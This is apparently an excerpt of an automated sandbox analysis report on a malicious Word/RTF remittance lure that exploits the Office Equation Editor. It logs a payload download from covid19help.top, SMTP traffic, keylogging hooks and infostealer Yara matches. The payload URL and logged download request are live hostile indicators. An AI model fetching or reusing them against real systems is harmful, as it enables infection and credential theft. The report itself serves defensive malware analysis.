                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 208.91.198.143:587 -> 192.168.2.22:49170

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 208.91.199.223:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 208.91.199.223:587
                    Source: global trafficHTTP traffic detected: GET /JBNvj66BwYU3yCv.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE2D0FDB-7F0A-4F00-BC04-18F54428C4C8}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /JBNvj66BwYU3yCv.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: unknownDNS traffic detected: queries for: covid19help.top
                    Source: EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F2E000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr, 00000005.00000002.365439049.0000000006EFA000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr.2.dr, JBNvj66BwYU3yCv[1].scr.2.dr, egFUHsL.exe.5.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F20000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F2E000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr, 00000005.00000002.365439049.0000000006EFA000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr.2.dr, JBNvj66BwYU3yCv[1].scr.2.dr, egFUHsL.exe.5.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: dzoihohj75439.scr, 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, egFUHsL.exe, 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F20000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F2E000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr, 00000005.00000002.365439049.0000000006EFA000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr.2.dr, JBNvj66BwYU3yCv[1].scr.2.dr, egFUHsL.exe.5.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: dzoihohj75439.scr, 00000005.00000002.361137396.0000000002238000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, egFUHsL.exe, 0000000F.00000002.372430657.0000000002351000.00000004.00000800.00020000.00000000.sdmp, egFUHsL.exe, 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: dzoihohj75439.scr, 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/JBNvj66BwYU3yCv.scr
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/JBNvj66BwYU3yCv.scrC:
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/JBNvj66BwYU3yCv.scrj
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/JBNvj66BwYU3yCv.scrttC:
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/tV
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F2E000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr, 00000005.00000002.365439049.0000000006EFA000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr.2.dr, JBNvj66BwYU3yCv[1].scr.2.dr, egFUHsL.exe.5.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                    Source: unknownHTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\dzoihohj75439.scrJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\egFUHsL.exe
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: Remittance 17042024.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.dzoihohj75439.scr.3419a00.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.dzoihohj75439.scr.33de1e0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                    Source: Screenshot number: 4Screenshot OCR: Enable editing") from the yellow bar aboveASSIGNMENTMCS 473: MARKETING MANAGEMENT & STRATEGYSTUDENT
                    .NET source code contains very large array initializations
                    Source: 5.2.dzoihohj75439.scr.600000.0.raw.unpack, .csLarge array initialization: : array initializer size 13798
                    Office equation editor drops PE file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\dzoihohj75439.scrJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess Stats: CPU usage > 49%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_001F70405_2_001F7040
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_001FD0B85_2_001FD0B8
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_001F133D5_2_001F133D
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_001FBC785_2_001FBC78
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_001F8DB05_2_001F8DB0
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F48885_2_009F4888
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F4CC05_2_009F4CC0
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F50F85_2_009F50F8
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F50F15_2_009F50F1
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F44505_2_009F4450
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F55E05_2_009F55E0
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001C887813_2_001C8878
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001C407013_2_001C4070
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001C392813_2_001C3928
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001C494013_2_001C4940
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001CF3B013_2_001CF3B0
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001CBBC813_2_001CBBC8
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_004F655013_2_004F6550
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_004F51F113_2_004F51F1
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_004F058013_2_004F0580
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_004F164013_2_004F1640
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_004F877813_2_004F8778
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002FD0B815_2_002FD0B8
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002FE0D015_2_002FE0D0
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002FBC7815_2_002FBC78
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002F8DB015_2_002F8DB0
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA488815_2_00AA4888
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA50F815_2_00AA50F8
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA50F115_2_00AA50F1
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA4CC015_2_00AA4CC0
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA445015_2_00AA4450
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_00AA55E015_2_00AA55E0
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001C887822_2_001C8878
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001C407022_2_001C4070
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001C392822_2_001C3928
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001C494022_2_001C4940
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001CF3B022_2_001CF3B0
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_001CBBC822_2_001CBBC8
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_006D655022_2_006D6550
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_006D51F122_2_006D51F1
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_006D058022_2_006D0580
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_006D164022_2_006D1640
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 22_2_006D877822_2_006D8778
                    Source: tmp871B.tmp.5.drOLE indicator, VBA macros: true
                    Source: tmp871B.tmp.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: Remittance 17042024.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 5.2.dzoihohj75439.scr.3419a00.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.dzoihohj75439.scr.33de1e0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: JBNvj66BwYU3yCv[1].scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: dzoihohj75439.scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: egFUHsL.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: _0020.AddAccessRule
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, b8tmsF9xU9Z1v5o74w.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, b8tmsF9xU9Z1v5o74w.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, EjX9gQSXWavgOAKiaJ.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@26/22@241/7
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$mittance 17042024.docJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMutant created: \Sessions\1\BaseNamedObjects\CXJbfdRjUuNVJpbtO
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6279.tmpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................d..................................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................d......."..........................s............................................Jump to behavior
